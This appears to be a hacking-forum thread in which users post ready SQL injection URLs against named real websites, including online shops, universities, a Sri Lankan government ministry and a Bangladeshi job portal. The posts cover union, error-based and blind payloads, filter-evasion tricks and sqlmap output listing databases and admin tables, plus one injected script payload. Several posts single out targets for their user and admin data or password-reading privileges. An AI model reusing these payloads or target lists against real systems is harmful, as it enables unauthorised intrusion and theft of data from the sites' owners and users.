www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group _concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20
5.5.60-MariaDB
Code:
www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@ @datadir,@@tmpdir,@@basedir),3,group_concat(table_ name separator " ") from information_schema.tables where table_schema=database() --%20
5.6.36-82.0
Code:
https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(), user(),@@hostname,@@version_compile_os,@@datadir,@ @tmpdir,@@basedir),9,10,11,12,13,14,15,16 from information_schema.columns where table_name='admin' and table_schema=database() --%20
5.6.38
Code:
https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws( 0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20
5.6.32-78.1
Code:
https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20
5.5.60-MariaDB
Code:
www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@v ersion_compile_os,@@datadir,@@tmpdir,@@basedir),gr oup_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20
5.7.27
Code:
https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3, group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20
10.1.41-MariaDB
Code:
http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3, group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20
5.6.45
Code:
https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10 ,11,12 from information_schema.tables where table_schema='compassbox' --%20
5.5.60-MariaDB
Code:
https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version( ),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6 from information_schema.tables where table_schema='sys'--%20
5.7.25
Arn0ld SHeremetev
07.09.2019, 23:48
Code:
http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+
version:
5.6.25-73.1
Code:
https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16--+
version
5.6.45
Code:
https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,2 2,23--+
version 5.5.40
WallHack
03.10.2019, 14:40
Fragmented SQL injection in the spartak bux script; some pretty decent projects run on it.
||extractvalue(1,concat(0x3a,(select @@version)))#
List of vulnerable sites: (more can be found)
POST request (for hack bar)
type_serf=1&nolimit=0&url=
http://site.ru&title=\
&description=
[SQL]
&url_banner=&plan=1000&timer=20&up_list=0&color=0&active=0&revisit=0&unic_ip=0&new_users=0&no_ref=0&sex_adv=0&to_ref=0&limit_d=0&limit_h=0&method_pay=1
For beginners
In the link title: \
Link description: commands
glassofvenice.com
online store
a lot of interesting stuff inside.
Code:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
Parameter: lp (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67 545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a 434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
Database: glassdb
[145 tables]
karkajoi
30.10.2019, 01:53
RWD said:
↑ (https://antichat.live/posts/4341925/)
glassofvenice.com
online store
lots of interesting stuff inside.
Is the DB encrypted?
fantasycruncher.com
sports-themed site; privileges to read MySQL passwords and all databases
Code:
https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
---
web application technology: PHP 5.6.29, Nginx 1.10.1
back-end DBMS: MySQL 5 (MariaDB fork)
DezMond™
31.10.2019, 10:54
Code:
http://www.wakecamp.ru/index.php?action=item&id=54+and+1=0+union+distinct+select+1,2+
Baskin-Robbins
31.10.2019, 19:12
The resource positions itself as the largest job-search site in Bangladesh; the traffic matches.
Microsoft SQL Server 2012 - 11.0.7462.6
Code:
http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=@@version -- &Fair_Id=5713
Code:
http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select db_name(1)) -- &Fair_Id=5713
Code:
http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select top 1 name from master..sysobjects where name not in ('sp_MSalreadyhavegeneration','sp_MSwritemergeperf counter')) -- &Fair_Id=5713
And a little something for variety
PostgreSQL 9.4.24 SIXSS (fixed)
Code:
http://www.acb.com/menu.php?id=-7253 union select 1,(chr(60)||chr(47)||chr(100)||chr(105)||chr(118)| |chr(62)||chr(60)||chr(115)||chr(99)||chr(114)||ch r(105)||chr(112)||chr(116)||chr(62)||chr(97)||chr( 108)||chr(101)||chr(114)||chr(116)||chr(40)||chr(4 1)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)| |chr(105)||chr(112)||chr(116)||chr(62)||concat_ws( chr(32)||chr(35)||chr(32),session_user,version(),a rray_to_string(array(select DISTINCT schemaname from pg_catalog.pg_tables),','),array_to_string(array(s elect tablename from pg_catalog.pg_tables where schemaname='pg_catalog'),','),array_to_string(arra y(select attname from pg_catalog.pg_attribute where attrelid=(select oid from pg_catalog.pg_class where relname='pg_class') AND attnum>0),','))) --%20
Sqlite 3.7.17
Code:
webdocs.cs.ualberta.ca/~hwsamuel/cardea/helix/catalog.php?id=4 union select 1,(sqlite_version())||char(35,35,35,35,35)||group_ concat(tbl_name),3,group_concat(sql),5,6,(select group_concat(path) from document)||char(35,35,35,35,35)||(select group_concat(url) from document),8,9 from sqlite_master --%20
Sqlite 3.3.7
Code:
www.newvideos.x0.com/channel/play.php?file_id=274' union select 1,2,(select sql from sqlite_master where type='table' limit 1,1),sqlite_version(),(select sql from sqlite_master where type='table' limit 0,1),6,7,8 from sqlite_master --%20
Code:
http://www.horus.com.eg/newdetails.php?Id=-89+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6--
Baskin-Robbins
14.11.2019, 16:57
A sourceforge subdomain
Code:
http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2))) --%20
Code:
http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid((select schema_name from information_schema.schemata limit 1,1), 1, 63), floor(rand(0)*2))) --%20
Baskin-Robbins
14.11.2019, 23:23
Make It Yours, or greetings from cooler_master
Be careful
Code:
https://makerhub.coolermaster.com/custom-lighting/download.php?id=-177 union select 1,2,3,4,5,6,(select schema_name from information_schema.schemata limit 0,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --%20
Code:
http://www.comwave.edu.pk/download.php?id=-131+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3--
Sri Lanka Ministry of Highways & Road Development
Code:
https://mohsl.gov.lk/en/projects.php?project=-1+union+select+1,2,3,4--&type=0&view_project=View%20Project
Sri Lanka, University of Ruhuna
Code:
http://www.sci.ruh.ac.lk/botany/academic_staff_profile.php?id=-893+union+select+1,2,3,4,5,6,7,8,9,10,11--
Code:
https://www.amaluxuryshower.it/eng/scheda-news.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,concat_ws(0x3a,version(),database(),user ()),20,21,22,23,24,25--
Centro Convegni Sant’Agostino
Code:
http://www.cortonasviluppo.it/dettaglio-news.php?id=-228+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8,9,10,11,12,13--
USA Indian Diaspora Council
Code:
http://www.indiandiasporacouncil.org/news.php?id=-86+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6--
Code:
https://www.trmh.com/news.php?id=-75+union+select+1,version(),3,4,5--
Samozvanec
20.07.2020, 00:05
Indian wooden toy shop
Code:
https://gooutofbox.com/category-list.php?id=-82 union select 1,concat(user(),0x3a,version(),0x3a,database())-- -
Code:
https://www.renzglobal.com/eshop/product-details.php?id=-56' union select 1,2,concat(user(),0x3a,version(),0x3a,database()), 4,5,6,7,8,9,10,11,12,13,14,15-- -
Indian shop.
15k traffic
Code:
https://www.corporategiftsbangalore.com/details.php?id=426' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database( ))*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -
Another Indian shop
Code:
https://www.print2shop.com/product-details.php?id=-75' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database( ))*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -&&idd=T-SHIRT WHITE POLYESTER
And the last one for today. A T-shirt printing service.
Guess the country yourselves
Code:
http://www.gibas.ro/news.php?view=news&id=-46+union+select+1,version(),3,4,5,6,7,8--&language=en
Bahauddin Zakariya University, Multan, Pakistan. (https://www.bzu.edu.pk/news.php?cid=-5+union+select+1,version(),database(),4,5,6,7--#)
Code:
https://www.bzu.edu.pk/news.php?cid=-5+union+select+1,version(),database(),4,5,6,7--
A Chilean law firm:
Code:
http://www.menayguijon.cl/detalle_b.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,database(),user(),version()),16,17--